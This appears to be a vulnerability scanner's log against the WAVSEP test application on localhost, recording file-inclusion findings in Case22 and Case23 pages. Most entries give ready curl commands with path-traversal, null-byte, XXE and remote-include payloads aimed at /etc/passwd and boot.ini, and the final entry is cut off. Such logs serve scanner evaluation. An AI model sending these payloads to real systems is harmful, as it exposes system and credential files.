Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
